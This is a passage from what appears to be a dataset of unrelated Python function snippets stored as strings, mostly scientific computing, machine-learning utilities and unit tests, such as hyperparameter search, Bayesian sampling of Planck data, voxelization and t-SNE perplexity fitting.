MatrixFactorization_FunkSVD_Cython,\n PureSVDRecommender,\n SLIM_BPR_Cython,\n SLIMElasticNetRecommender\n ]\n\n\n\n\n from Base.Evaluation.Evaluator import EvaluatorHoldout\n\n evaluator_validation = EvaluatorHoldout(URM_validation, cutoff_list=[5])\n evaluator_test = EvaluatorHoldout(URM_test, cutoff_list=[5, 10])\n\n\n runParameterSearch_Collaborative_partial = partial(runParameterSearch_Collaborative,\n URM_train = URM_train,\n metric_to_optimize = \"MAP\",\n n_cases = 10,\n evaluator_validation_earlystopping = evaluator_validation,\n evaluator_validation = evaluator_validation,\n evaluator_test = evaluator_test,\n output_folder_path = output_folder_path,\n similarity_type_list = [\"cosine\"],\n parallelizeKNN = False)\n\n\n\n\n\n pool = multiprocessing.Pool(processes=int(multiprocessing.cpu_count()), maxtasksperchild=1)\n pool.map(runParameterSearch_Collaborative_partial, collaborative_algorithm_list)\n\n #\n #\n # for recommender_class in collaborative_algorithm_list:\n #\n # try:\n #\n # runParameterSearch_Collaborative_partial(recommender_class)\n #\n # except Exception as e:\n #\n # print(\"On recommender {} Exception {}\".format(recommender_class, str(e)))\n # traceback.print_exc()\n #", "def test_penalty_compute(self):\n objective = {'G': numpy.zeros((9)),\n 'H': numpy.diag((1,)*9),\n 'X': 1}\n for penalty in self.penalties:\n result=penalty.compute([1]*self.np, objective)\n self.assertEqual(tuple, type(result))\n # more tests go here", "def sample_all_planck_points(all_ids, adaptivep0 = True, planck_tqu_cursor = None, planck_cov_cursor = None, region = \"SC_241\", verbose = False, tol=1E-5, sampletype = \"mean_bayes\", testproj=False):\n if testproj:\n all_naive_p = np.zeros(len(all_ids))\n all_naive_psi = np.zeros(len(all_ids))\n else:\n all_pMB = np.zeros(len(all_ids))\n all_psiMB = np.zeros(len(all_ids))\n\n if planck_tqu_cursor is None:\n print(\"Loading default planck_tqu_cursor because it was not provided\")\n planck_tqu_db = sqlite3.connect(\"planck_TQU_gal_2048_db.sqlite\")\n planck_tqu_cursor = planck_tqu_db.cursor()\n \n if planck_cov_cursor is None:\n print(\"Loading default planck_cov_cursor because it was not provided\")\n planck_cov_db = sqlite3.connect(\"planck_cov_gal_2048_db.sqlite\")\n planck_cov_cursor = planck_cov_db.cursor()\n\n # Get p0 and psi0 sampling grids\n p0_all = np.linspace(0, 1, 165)\n psi0_all = np.linspace(0, np.pi, 165, endpoint=False) # don't count both 0 and pi\n\n update_progress(0.0)\n for i, _id in enumerate(all_ids):\n #if _id[0] in 
[3400757, 793551, 2447655]:\n posterior_obj = PlanckPosterior(_id[0], planck_tqu_cursor, planck_cov_cursor, p0_all, psi0_all, adaptivep0 = adaptivep0)\n #print(\"for id {}, p0 grid is {}\".format(_id, posterior_obj.sample_p0))\n #print(\"for id {}, pmeas is {}, psimeas is {}, psi naive is {}\".format(_id, posterior_obj.pmeas, posterior_obj.psimeas, posterior_obj.naive_psi))\n #print(\"for id {}, likelihood[0, 1] = {}\".format(_id, posterior_obj.posterior[0, 1]))\n #print(p0_all[0], psi0_all[1]) \n #lnlikeout = lnlikelihood(_id[0], planck_tqu_cursor, planck_cov_cursor, p0_all[0], psi0_all[1])\n #print(\"for id {}, lnlikelihood[0, 1] = {}\".format(_id, lnlikeout[0]))\n #print(np.exp(lnlikeout[0]))\n \n if testproj:\n all_naive_p[i] = posterior_obj.pmeas\n all_naive_psi[i] = posterior_obj.psimeas \n else:\n if sampletype is \"mean_bayes\":\n all_pMB[i], all_psiMB[i] = mean_bayesian_posterior(posterior_obj, center = \"naive\", verbose = verbose, tol=tol)\n elif sampletype is \"MAP\":\n all_pMB[i], all_psiMB[i] = maximum_a_posteriori(posterior_obj, verbose = verbose)\n if verbose is True:\n print(\"for id {}, num {}, I get pMB {} and psiMB {}\".format(_id, i, all_pMB[i], all_psiMB[i]))\n\n update_progress((i+1.0)/len(all_ids), message='Sampling: ', final_message='Finished Sampling: ')\n \n if testproj:\n return all_naive_p, all_naive_psi\n else:\n return all_pMB, all_psiMB", "def check_parameters(args):\n inference_algorithm = args[\"inference_algorithm\"]\n combination_algorithm = args[\"combination_algorithm\"]\n measures = args[\"measures\"]\n prior = args[\"prior\"]\n inverse_dynamics_model_checkpoint = args[\"inverse_dynamics_model_checkpoint\"]\n\n check_in(\n \"inference_algorithm\",\n inference_algorithm,\n [\n \"rlsp\",\n \"latent_rlsp\",\n \"latent_rlsp_ablation\",\n \"sampling\",\n \"deviation\",\n \"reachability\",\n \"spec\",\n ],\n )\n check_in(\n \"combination_algorithm\",\n combination_algorithm,\n (\"additive\", \"bayesian\", \"latent_vi\", \"latent_ppo\"),\n )\n check_in(\"prior\", prior, [\"gaussian\", \"laplace\", \"uniform\"])\n\n for i, measure in enumerate(measures):\n check_in(\n \"measure {}\".format(i),\n measure,\n [\"inferred_reward\", \"true_reward\", \"final_reward\", \"model_training_error\"],\n )\n\n if combination_algorithm == \"bayesian\":\n check_in(\"inference_algorithm\", inference_algorithm, [\"rlsp\", \"sampling\"])\n\n if inference_algorithm == \"latent_rlsp\":\n check_not_none(\n \"inverse_dynamics_model_checkpoint\", inverse_dynamics_model_checkpoint\n )\n\n if (\n combination_algorithm.startswith(\"latent\")\n and inference_algorithm != \"latent_rlsp\"\n ):\n raise ValueError(\n \"combination_algorithm 'latent' should only be used with 'latent_rlsp'\"\n )", "def voxelize_points(points, pc_bbox_center, voxel_resolution, num_voxels_per_dim, pc_center_in_voxel_grid):\n\n # this is the voxel grid we are going to return\n voxel_grid = np.zeros((num_voxels_per_dim,\n num_voxels_per_dim,\n num_voxels_per_dim), dtype=np.bool)\n\n # take the points and convert them from meters to voxel space coords\n centered_scaled_points = np.floor(\n (points - np.array(pc_bbox_center) + np.array(\n pc_center_in_voxel_grid) * voxel_resolution) / voxel_resolution)\n\n # remove any points that are beyond the area that falls in our voxel grid\n mask = centered_scaled_points.max(axis=1) < num_voxels_per_dim\n centered_scaled_points = centered_scaled_points[mask]\n\n # if we don't have any more points that fall within our voxel grid\n # return an empty grid\n if 
centered_scaled_points.shape[0] == 0:\n return voxel_grid\n\n # remove any points that are outside of the region we are voxelizing\n # as they are to small.\n mask = centered_scaled_points.min(axis=1) > 0\n centered_scaled_points = centered_scaled_points[mask]\n\n # if we don't have any more points that fall within our voxel grid,\n # return an empty grid\n if centered_scaled_points.shape[0] == 0:\n return voxel_grid\n\n # treat our remaining points as ints, since we are already in voxel coordinate space.\n # this points shoule be things like (5, 6, 7) which represent indices in the voxel grid.\n csp_int = centered_scaled_points.astype(int)\n\n # create a mask from our set of points.\n mask = (csp_int[:, 0], csp_int[:, 1], csp_int[:, 2])\n\n # apply the mask to our voxel grid setting voxel that had points in them to be occupied\n voxel_grid[mask] = 1\n\n return voxel_grid", "def test_get_points_to_estimate(self):\r\n # Ref in range.\r\n obs = self.estimator1._get_points_to_estimate(4, 1, 5, 4)\r\n self.assertEqual(obs, [1, 2, 3, 4, 5])\r\n\r\n # Ref not in range.\r\n obs = self.estimator1._get_points_to_estimate(4, 5, 10, 2)\r\n self.assertEqual(obs, [4, 5, 7, 9])\r\n\r\n # stop not supplied.\r\n obs = self.estimator1._get_points_to_estimate(5, 5, num_steps=2)\r\n self.assertEqual(obs, [5, 17, 29])", "def __check1d(self, npts, dmax):\n print 'Checking %d-point rule:' % npts\n xi, wt = q1db.qLoc(npts)\n self.assertEqual(len(xi), len(wt))\n\n for d in range(dmax + 1):\n integral = self.integral(xi, wt, self.monomial(d))\n trueval = (float(1)/float(d + 1))\n print ' degree: %d, value: %f, true = %f' % (d, integral, trueval)\n self.assertTrue(np.abs(integral - trueval) < self.tol,\n 'degree: %d, value: %f, true = %f' % (d, integral, trueval))\n\n print '... 
%d-point rule: OK\\n' % npts\n\n return", "def check_point_inside(self, points):\n return all([self._domain.check_point_inside(point) for point in points])", "def point_valid(pt):\n\n cell_coords = get_cell_coords(pt)\n for idx in get_neighbours(cell_coords):\n nearby_pt = samples[idx]\n # Squared distance between or candidate point, pt, and this nearby_pt.\n distance2 = (nearby_pt[0]-pt[0])**2 + (nearby_pt[1]-pt[1])**2\n if distance2 < r**2:\n # The points are too close, so pt is not a candidate.\n return False\n # All points tested: if we're here, pt is valid\n return True", "def test_points_calculation(self):\n\n assert self.test_shape.points == [\n (1030.0, 525.0),\n (1030.0, 475.0),\n (970.0, 475.0),\n (970.0, 525.0),\n ]", "def do_pnp(pts3d_for_pnp, pts2d_for_pnp, K, iterations=200, reprojThresh=5):\n list_pts3d_for_pnp = pts3d_for_pnp\n list_pts2d_for_pnp = pts2d_for_pnp\n pts3d_for_pnp = np.squeeze(np.array(pts3d_for_pnp))\n pts2d_for_pnp = np.expand_dims(np.squeeze(np.array(pts2d_for_pnp)), axis=1)\n num_pts = len(pts3d_for_pnp)\n\n highest_inliers = 0\n for i in range(iterations):\n pt_idxs = np.random.choice(num_pts, 6, replace=False)\n pts3 = np.array([pts3d_for_pnp[pt_idxs[i]] for i in range(len(pt_idxs))])\n pts2 = np.array([pts2d_for_pnp[pt_idxs[i]] for i in range(len(pt_idxs))])\n _, rvec, tvec = cv2.solvePnP(pts3, pts2, K, distCoeffs=np.array([]), flags=cv2.SOLVEPNP_ITERATIVE)\n R, _ = cv2.Rodrigues(rvec)\n pnp_errors, projpts, avg_err, perc_inliers = test_reproj_pnp_points(list_pts3d_for_pnp, list_pts2d_for_pnp, R, tvec, K, rep_thresh=reprojThresh)\n if highest_inliers < perc_inliers:\n highest_inliers = perc_inliers\n best_R = R\n best_tvec = tvec\n R = best_R\n tvec = best_tvec\n print('rvec:', rvec,'\\n\\ntvec:', tvec)\n\n return R, tvec", "def test_find_unused_parameters_when_unused_parameters_empty(self):\n\n class FindUnusedParamModule(nn.Module):\n def __init__(self):\n super().__init__()\n self.t0 = Task()\n self.t1 = Task()\n\n def task_parameters(self):\n return (self.t0.p, self.t1.p)\n\n def forward(self, x, rank):\n return self.t1(self.t0(x)) if rank == 0 else self.t1(x)\n\n def run_and_verify_grad(model):\n # Run forward\n output = model(8, self.rank)\n\n # The grads of all parameters should be None at this point.\n [self.assertIsNone(t_p.grad) for t_p in model.module.task_parameters()]\n\n # Run backward\n output.mean().backward()\n\n # Now locally unused parameter should have grad updated on all ranks.\n [self.assertIsNotNone(t_p.grad) for t_p in model.module.task_parameters()]\n\n process_group = self._get_process_group()\n\n # Test on CPU\n cpu_model = DistributedDataParallel(\n FindUnusedParamModule().cpu(),\n process_group=process_group,\n find_unused_parameters=True,\n )\n run_and_verify_grad(cpu_model)\n\n # Test on GPU\n device_id = gpus_for_rank(self.world_size)[self.rank][0]\n gpu_model = DistributedDataParallel(\n FindUnusedParamModule().to(device_id),\n device_ids=[device_id],\n process_group=process_group,\n find_unused_parameters=True,\n )\n run_and_verify_grad(gpu_model)", "def optimize_self(self):\n self.compute_predicate_values();\n \"\"\" Firstly,adjust the f(x) into > alpha_0; \"\"\"\n for i in range(len(self.RING_PARA_PAIR_CD)):\n self.adjust_to_excepted_value(self.RING_PARA_PAIR_CD[i]);\n self.RING_PARA_PAIR_CD[i][0].VECTOR = RUNNING_DATA[self.RING_PARA_PAIR_CD[i][0].WORD_ID]; # 更新内部VECTOR;\n self.RING_PARA_PAIR_CD[i][2] = self.RING_PARA_PAIR_CD[i][0].polynomial_func(self.RING_PARA_PAIR_CD[i][1]); # 更新内部ALPHA;\n for i in 
range(len(self.RING_PARA_PAIR_CC)):\n # ************** BUG 0627 **********************\n # if self.RING_PARA_PAIR_CC[i][2]<41 and self.RING_PARA_PAIR_CC[i][2]>40: # ---------------------------------------------------------------->>>>>\n # print( RUNNING_DATA[self.RING_PARA_PAIR_CC[i][0].WORD_ID] ); # ---------------------------------------------------------------->>>>>\n self.adjust_to_excepted_value(self.RING_PARA_PAIR_CC[i]); \n # ************** BUG 0627 **********************\n # if self.RING_PARA_PAIR_CC[i][2]<41 and self.RING_PARA_PAIR_CC[i][2]>40: # ---------------------------------------------------------------->>>>> \n # print(self.RING_PARA_PAIR_CC[i][0].VECTOR); # ---------------------------------------------------------------->>>>>\n # print(RUNNING_DATA[self.RING_PARA_PAIR_CC[i][0].WORD_ID]); # ---------------------------------------------------------------->>>>>\n # print(self.RING_PARA_PAIR_CC[i][0].polynomial_func(self.RING_PARA_PAIR_CC[i][1])); # ---------------------------------------------------------------->>>>>\n # print( np.cumprod( self.RING_PARA_PAIR_CC[i][1] - self.RING_PARA_PAIR_CC[i][0].VECTOR )[-1] ); # ---------------------------------------------------------------->>>>>\n self.RING_PARA_PAIR_CC[i][0].VECTOR = RUNNING_DATA[self.RING_PARA_PAIR_CC[i][0].WORD_ID]; # 更新内部VECTOR;\n self.RING_PARA_PAIR_CC[i][2] = self.RING_PARA_PAIR_CC[i][0].polynomial_func(self.RING_PARA_PAIR_CC[i][1]); # 更新内部ALPHA;\n \"\"\" Secondly,adjust the alpha_0 < p_min(y_n) < q_min(x_n)\"\"\" \n P_MIN = 99999999.0; Q_MIN = 99999999.0;P_MAX = 0.0;Q_MAX = 0.0;\n CD_ID = 0;CD_MIN=0;\n # 找到结论中谓词的最小多项式值\n for RING_PARA_PAIR in self.RING_PARA_PAIR_CC:\n if Q_MIN>RING_PARA_PAIR[2]: Q_MIN=RING_PARA_PAIR[2];\n # if Q_MAX<RING_PARA_PAIR[2]: Q_MAX=RING_PARA_PAIR[2];\n # 不满足小于结论最小值的那些环的TARGET_ALPHA更新; \n for RING_PARA_PAIR in self.RING_PARA_PAIR_CD:\n if P_MIN>RING_PARA_PAIR[2]: P_MIN=RING_PARA_PAIR[2];CD_MIN=CD_ID;# self.RING_PARA_PAIR_CD[CD_ID][3]=-Q_MIN;\n # if P_MAX<RING_PARA_PAIR[2]: P_MAX=RING_PARA_PAIR[2];self.RING_PARA_PAIR_CD[CD_ID][3]=-Q_MAX;\n CD_ID+=1;\n self.RING_PARA_PAIR_CD[CD_MIN][3]=-Q_MIN; \n # 优化不满足小于结论最小值的那些环 \n for i in range(len(self.RING_PARA_PAIR_CD)): \n if self.RING_PARA_PAIR_CD[i][3]!=ALPHA:\n if P_MIN>Q_MIN:\n self.adjust_to_excepted_value(self.RING_PARA_PAIR_CD[i]); \n self.RING_PARA_PAIR_CD[i][0].VECTOR = RUNNING_DATA[self.RING_PARA_PAIR_CD[i][0].WORD_ID]; # 更新内部VECTOR;\n self.RING_PARA_PAIR_CD[i][2] = self.RING_PARA_PAIR_CD[i][0].polynomial_func(self.RING_PARA_PAIR_CD[i][1]); # 更新内部ALPHA;", "def single_iteration(args):\n def single_acceptance_condition(args):\n \"\"\"checks proposal has been accepted or max iterations reached\n\n Parameters\n ----------\n args : tuple\n see loop variable in `single_iteration`\n\n Returns\n -------\n bool:\n True if proposal not accepted and number of attempts to get\n an accepted proposal not yet reached\n \"\"\"\n return np.logical_and(\n np.less(args[-2], 1),\n np.less(args[-1], max_acceptance))\n\n def single_acceptance(args):\n \"\"\"Draws a proposal, simulates and compresses, checks distance\n\n A new proposal is drawn from a truncated multivariate normal\n distribution whose mean is centred on the parameter to move and\n the covariance is set by the population. From this proposed\n parameter value a simulation is made and compressed and the\n distance from the target is calculated. 
If this distance is\n less than the current position then the proposal is accepted.\n\n Parameters\n ----------\n args : tuple\n see loop variable in `single_iteration`\n\n Returns\n -------\n bool:\n True if proposal not accepted and number of attempts to get\n an accepted proposal not yet reached\n\n Todo\n ----\n Parallel sampling is currently commented out\n \"\"\"\n (rng, loc, scale, summ, dis, draws, accepted,\n acceptance_counter) = args\n rng, key = jax.random.split(rng)\n proposed, summaries = self.get_samples(\n key, None, dist=tmvn(\n loc, scale, self.prior.low, self.prior.high,\n max_counter=max_samples))\n distances = np.squeeze(\n self.distance_measure(\n np.expand_dims(summaries, 0),\n target,\n F))\n # if n_parallel_simulations is not None:\n # min_distance_index = np.argmin(distances)\n # min_distance = distances[min_distance_index]\n # closer = np.less(min_distance, ϵ)\n # loc = jax.lax.cond(\n # closer,\n # lambda _ : proposed[min_distance_index],\n # lambda _ : loc,\n # None)\n # summ = jax.lax.cond(\n # closer,\n # lambda _ : summaries[min_distance_index],\n # lambda _ : summ,\n # None)\n # dis = jax.lax.cond(\n # closer,\n # lambda _ : distances[min_distance_index],\n # lambda _ : dis,\n # None)\n # iteration_draws = n_parallel_simulations \\\n # - np.isinf(distances).sum()\n # draws += iteration_draws\n # accepted = closer.sum()\n # else:\n closer = np.less(distances, np.min(dis))\n loc = jax.lax.cond(\n closer,\n lambda _: proposed,\n lambda _: loc,\n None)\n summ = jax.lax.cond(\n closer,\n lambda _: summaries,\n lambda _: summ,\n None)\n dis = jax.lax.cond(\n closer,\n lambda _: distances,\n lambda _: dis,\n None)\n iteration_draws = 1 - np.isinf(distances).sum()\n draws += iteration_draws\n accepted = closer.sum()\n return (rng, loc, scale, summ, dis, draws, accepted,\n acceptance_counter + 1)\n\n (rng, samples, summaries, distances, weighting, acceptance_reached,\n iteration_counter, total_draws) = args\n n_to_move = samples[ϵ_ind:].shape[0]\n cov = self.w_cov(samples, weighting)\n scale = np.linalg.cholesky(cov)\n rng, *keys = jax.random.split(rng, num=n_to_move + 1)\n\n results = jax.vmap(\n lambda key, loc, scale, summaries, distances, draws, accepted,\n acceptance_counter: jax.lax.while_loop(\n single_acceptance_condition,\n single_acceptance,\n (key, loc, scale, summaries, distances, draws, accepted,\n acceptance_counter)))(\n np.array(keys),\n samples[ϵ_ind:],\n np.repeat(np.expand_dims(scale, 0), n_to_move, axis=0),\n summaries[ϵ_ind:],\n distances[ϵ_ind:],\n np.zeros(n_to_move, dtype=np.int32),\n np.zeros(n_to_move, dtype=np.int32),\n np.zeros(n_to_move))\n\n weighting = jax.vmap(\n lambda proposed: (\n self.prior.prob(proposed)\n / (np.sum(weighting * tfd.MultivariateNormalTriL(\n loc=proposed,\n scale_tril=np.repeat(\n np.expand_dims(scale, 0),\n samples.shape[0],\n axis=0)).prob(proposed)))))(\n np.vstack([samples[:ϵ_ind], results[1]]))\n samples = jax.ops.index_update(\n samples,\n jax.ops.index[ϵ_ind:, :],\n results[1])\n summaries = jax.ops.index_update(\n summaries,\n jax.ops.index[ϵ_ind:, :],\n results[3])\n distances = jax.ops.index_update(\n distances,\n jax.ops.index[ϵ_ind:],\n results[4])\n sample_indices = np.argsort(distances)\n samples = samples[sample_indices]\n summaries = summaries[sample_indices]\n distances = distances[sample_indices]\n weighting = weighting[sample_indices]\n acceptance_reached = results[-2].sum() / results[-3].sum()\n return (rng, samples, summaries, distances, weighting,\n acceptance_reached, iteration_counter + 
1,\n total_draws + results[-3].sum())", "def precompute_scoring():\n global volume_void_inclusion\n global attract_point_distances\n global perlin_values\n \n volume_void_inclusion = []\n for i,void in enumerate(volumes_void):\n inclusion = gh.PointInBrep(void,points_input,False)\n volume_void_inclusion.append(inclusion)\n \n attract_point_distances = []\n for i,point in enumerate(points_attractor):\n distances = gh.Division(gh.Distance(point,points_input),max_dist)\n attract_point_distances.append(distances)", "def parameter_grid_search(X, y, model, metric, transform_grid, param_grid,\n test_split_size=0.2, verbose=False, logger=None):\n print_status_message('Beginning parameter grid search...', verbose, logger)\n t0 = time.time()\n params_list = list(ParameterGrid(param_grid))\n X_train, X_eval, y_train, y_eval = train_test_split(X, y, test_size=test_split_size)\n\n for transforms in transform_grid:\n print_status_message('Transforms = {0}'.format(str(transforms)), verbose, logger)\n print_status_message('', verbose, logger)\n print_status_message('', verbose, logger)\n transforms = fit_transforms(X_train, y_train, transforms)\n X_train = apply_transforms(X_train, transforms)\n X_eval = apply_transforms(X_eval, transforms)\n\n for params in params_list:\n tsub0 = time.time()\n for param, value in params.iteritems():\n print(param + \" = \" + str(value))\n setattr(model, param, value)\n\n print_status_message('Fitting model...', verbose, logger)\n model.fit(X_train, y_train)\n\n train_score = predict_score(X_train, y_train, model, metric)\n print_status_message('Training score = {0}'.format(str(train_score)), verbose, logger)\n\n eval_score = predict_score(X_eval, y_eval, model, metric)\n print_status_message('Evaluation score = {0}'.format(str(eval_score)), verbose, logger)\n\n tsub1 = time.time()\n print_status_message('Model trained in {0:3f} s.'.format(tsub0 - tsub1), verbose, logger)\n print_status_message('', verbose, logger)\n print_status_message('', verbose, logger)\n\n t1 = time.time()\n print_status_message('Grid search complete in {0:3f} s.'.format(t0 - t1), verbose, logger)", "def check_points(nodeL, nodeR, points, city):\n A = points\n B = city\n C = nodeL\n D = nodeR\n\n d1 = (B[0] - A[0]) * (C[1] - A[1]) - (B[1] - A[1]) * (C[0] - A[0])\n d2 = (B[0] - A[0]) * (D[1] - A[1]) - (B[1] - A[1]) * (D[0] - A[0])\n\n if (d1 < 0) & (d2 < 0):\n return True\n if (d1 > 0) & (d2 > 0):\n return True\n else:\n return False", "def __call__(self, parvals, x):\n fit_logger.info('Calculating params:')\n for parname, parval, newparval in zip(self.model.parnames, self.model.parvals, parvals):\n if parval != newparval:\n fit_logger.info(' {0}: {1}'.format(parname, newparval))\n self.model.parvals = parvals\n\n return np.ones_like(x)", "def par_test_13(self):\n\n for i in range(4):\n self.XYZ_par_factor.setMaxDepth(i)\n self.XKW_par_factor.setMaxDepth(i)\n\n res = self.XYZ_factor.mult(self.XKW_factor)\n par_res = self.XYZ_par_factor.mult(self.XKW_par_factor)\n assert res.rand_vars == par_res.rand_vars and res.values == par_res.values", "def run_local_search(self, k, x, x_f, xb, fxb, improve, search_range, g, task):\n for _ in range(self.num_searches):\n x, x_f, xb, fxb, improve, grade, search_range = self.local_searches[k](x, x_f, xb, fxb, improve, search_range, task, bonus1=self.bonus1,\n bonus2=self.bonus2, rng=self.rng)\n g += grade\n return x, x_f, xb, fxb, improve, search_range, g", "def convergentPointCheck(data, velocity):\n import astropy.units as u\n \n parallax = 
1000/data.icrs.distance\n ra = data.icrs.ra.to(u.rad)\n dec= data.icrs.dec.to(u.rad)\n pm_ra_cosdec = data.icrs.pm_ra_cosdec*4.74047/parallax\n pm_dec = data.icrs.pm_dec*4.74047/parallax\n\n vpred = vecRot(velocity,'zyx', np.transpose(np.array([-ra, dec, np.zeros(ra.size)]))) # return vr, pm_ra_cosdec, pm_dec\n psi = np.arctan2(vpred[:,2],vpred[:,1]) # angle \n vpred_rot = vecRot(vpred, 'x', -psi)\n vobs = np.transpose([data.icrs.radial_velocity, pm_ra_cosdec, pm_dec])\n vobs_rot = vecRot(vobs, 'x', -psi)\n \n dmu_parallel = vobs_rot[:,1] - vpred_rot[:,1]\n dmu_perpendicular = vobs_rot[:,2] - vpred_rot[:,2]\n \n return dmu_parallel, dmu_perpendicular, psi", "def x2p(self, X=np.array([]), tol=1e-12, perplexity=30.0):\n\n # Initialize some variables\n # print(\"\\tComputing pairwise distances...\")\n (n, d) = X.shape\n sum_X = np.sum(np.square(X), 1)\n D = np.add(np.add(-2 * np.dot(X, X.T), sum_X).T, sum_X)\n P = np.zeros((n, n))\n beta = np.ones((n, 1)) / np.max(D) # modified\n logU = np.log(perplexity)\n\n # Loop over all datapoints\n for i in range(n):\n\n # Print progress\n # if i % 500 == 0:\n # print(\"\\tComputing P-values for point %d of %d...\" % (i, n))\n\n # Compute the Gaussian kernel and entropy for the current precision\n betamin = -np.inf\n betamax = np.inf\n Di = D[i, np.concatenate((np.r_[0:i], np.r_[i + 1:n]))]\n (H, thisP) = self.Hbeta(Di, beta[i])\n\n # Evaluate whether the perplexity is within tolerance\n Hdiff = H - logU\n tries = 0\n while np.abs(Hdiff) > tol and tries < 1000: #\n\n # If not, increase or decrease precision\n if Hdiff > 0:\n betamin = beta[i].copy()\n if betamax == np.inf or betamax == -np.inf:\n beta[i] = beta[i] * 2.\n else:\n beta[i] = (beta[i] + betamax) / 2.\n else:\n betamax = beta[i].copy()\n if betamin == np.inf or betamin == -np.inf:\n beta[i] = beta[i] / 2.\n else:\n beta[i] = (beta[i] + betamin) / 2.\n\n # Recompute the values\n (H, thisP) = self.Hbeta(Di, beta[i])\n Hdiff = H - logU\n tries += 1\n\n # Set the final row of P\n P[i, np.concatenate((np.r_[0:i], np.r_[i + 1:n]))] = thisP\n\n # Return final P-matrix\n # print(\"\\tMean value of sigma: %f\" % np.mean(np.sqrt(1 / beta)))\n self.beta = beta\n return P", "def par_test_11(self):\n\n for i in range(4):\n self.XYZ_par_factor.setMaxDepth(i)\n self.XYZ_par_factor.setMaxDepth(i)\n\n res = self.XYZ_factor.mult(self.XYZ_factor)\n par_res = self.XYZ_par_factor.mult(self.XYZ_par_factor)\n assert res.rand_vars == par_res.rand_vars and res.values == par_res.values", "def _test_parallel_transport(self, k=None):\n import itertools\n\n if k is None:raise ValueError('This should not get called')\n\n s = space(curvature=k)\n\n # require -P + P = 0\n # require P + P = 2P\n # require P + P + P = 3P\n # for all K\n for rp in (\n ((), 1),\n ((1,), 1),\n ((1,), 3),\n ((3/5, 4/5), 1),\n ((-4/5, 3/5), 2),\n ((3/7, 0, -6/7, -2/7), 3),\n ((0, -18/25, 0, 0, 11/25, -12/25, -6/25), 3)\n ):\n p = s.make_point(rp[0], rp[1])\n self.assertTrue(isclose(\n abs(-p + p),\n 0,\n abs_tol=1e-12\n ))\n p2 = s.make_point(rp[0], rp[1] * 2)\n self.assertTrue(point_isclose(\n p + p,\n p2\n ))\n p3 = s.make_point(rp[0], rp[1] * 3)\n self.assertTrue(point_isclose(\n p + p + p,\n p3\n ))\n\n # require P + Q = Q + P\n # but only if K = 0\n for p, q in itertools.permutations(\n map(\n (lambda tup:s.make_point(tup, 3)),\n (\n (15/35, -18/35, -10/35, 24/35),\n (0, 0, 3/5, 4/5),\n (4/21, 8/21, 0, 19/21),\n (4/21, 1/21, -18/21, 10/21)\n )\n ),\n 2\n ):\n self.assertTrue(point_isclose(p + q, q + p) == (k==0))", "def param_locked_SA(fn, 
*x, **kwargs):\n num_steps=int(kwargs.get(\"num_steps\",10)) #num of locked values to test/param\n max_steps=int(kwargs.get(\"max_steps\",400)) #max num iterations for\n chi2_lim=int(kwargs.get(\"chi2_lim\",4))\n\n param_ranges={k:v for k,v in kwargs.iteritems() if not k in \"max_steps chi2_lim\".split()}\n param_samples, all_chi2=None,None\n epsilon=1./float(num_steps)\n for param, rng in param_ranges.iteritems():\n #lock each param\n for val in np.linspace(rng[0],rng[1], num_steps):\n #update the parameter and put into kwargs\n new_rng=[val,val]\n kwargs[param]=new_rng\n psamp, chi2=simulated_annealing(fn, *x, **kwargs)\n if all_chi2 is None:\n param_samples, all_chi2=psamp, chi2\n else:\n param_samples=np.concatenate((param_samples, psamp))\n all_chi2=np.concatenate((all_chi2, chi2))\n kwargs[param]=rng\n return param_samples, all_chi2", "def task_3():\n threshold = [0.86, 0.87, 0.88, 0.89]\n for t in threshold: \n # Create a list to store the number of iteration that DE converge \n # @ given threshold for p1(5, 40), p2(10, 20), p3(20, 10), p4(40, 5) \n iter_p1 = []\n iter_p2 = [] \n iter_p3 = [] \n iter_p4 = []\n \n # Create a list to store the cost at the end of the DE \n # p1(5, 40), p2(10, 20), p3(20, 10), p4(40, 5)\n cost_p1 = []\n cost_p2 = []\n cost_p3 = []\n cost_p4 = [] \n \n # Run the experiment and record the result for the given threshold\n experiment(t)\n \n # Loop over experiment and record the number of iteration of each set of param\n # for 30 times\n for i in range(30):\n record = experiment(t) # replace the argument with the testing threshold\n iter_p1.append(record[0][0])\n iter_p2.append(record[1][0])\n iter_p3.append(record[2][0])\n iter_p4.append(record[3][0])\n \n cost_p1.append(record[0][1])\n cost_p2.append(record[1][1])\n cost_p3.append(record[2][1])\n cost_p4.append(record[3][1])\n \n # Convert the result into a dictionary then transform it to a pandas DataFrame\n iteration_dict = {\"iteration(5,40)\":iter_p1, \"iteration(10,20)\":iter_p2, \n \"iteration(20,10)\": iter_p3, \"iteration(40,5)\": iter_p4}\n cost_dict = {\"cost(5,40)\": cost_p1, \"cost(10,20)\": cost_p2, \n \"cost(20,10)\": cost_p3, \"cost(40,5)\":cost_p4}\n df_iteration = pd.DataFrame.from_dict(iteration_dict) \n df_iteration.to_csv(\"iteration_\" + str(t) + \".csv\")\n \n df_cost = pd.DataFrame.from_dict(cost_dict)\n df_cost.to_csv(\"cost_\" + str(t) + \".csv\")", "def computeAnsSets(self, param_dict):\n self.writeSolverConfigFile(param_dict)\n # run the process\n process = subprocess.Popen(self.bash_cmd.split(), stdout=subprocess.PIPE)\n output = process.communicate()[0]\n return self.parseGeneratedProblems(output)", "def _compute_results(self):\n self.Y_best = best_value(self.Y)\n self.x_opt = self.X[np.argmin(self.Y),:]\n self.fx_opt = np.min(self.Y)\n self.distance = self._compute_distance_betw_consecutive_x()", "def FindGrid(self, p_float=..., p_float=..., p_float=..., *args, **kwargs):\n ...", "def beam_search(X, u, w, b, relLabels):\n\n candidate_paths = [[] for _ in range(10)] # contains the candidate label sets\n candidate_vals =[[] for _ in range(10)] # contains the label values (-1/1) for each candidate set\n candidate_scores = [0. 
for _ in range(10)]\n min_score = -1000\n\n iter = 0\n start = 0\n while True:\n # print(\"Iter: \", iter)\n intermediate_paths = {}\n # intermediate_paths_val = []\n interim_scores = []\n hash_table = {}\n\n cnt_paths = 0\n for cp in range(5):\n labels_curr = candidate_paths[cp]\n labels_val_curr = candidate_vals[cp]\n scores_curr = candidate_scores[cp]\n Y = -np.ones((10, 1))\n for lv in range(len(labels_val_curr)):\n Y[labels_curr[lv]] = labels_val_curr[lv]\n\n for l in range(10):\n candidate_interim = labels_curr[:]\n candidate_vals_interim = labels_val_curr[:]\n # if l in labels_curr:\n # continue\n\n temp_relLabels = []\n for lc in range(len(labels_curr)):\n temp_relLabels.extend(relLabels[labels_curr[lc]])\n\n # temp_relLabels = np.array(list(set(temp_relLabels)))\n temp_relLabels = np.array(list(set(relLabels[l]).intersection(set(labels_curr))))\n model_pos = returnModelVal(X, Y, 1.0, u[l], u[l], b[l][0], np.array(temp_relLabels))\n 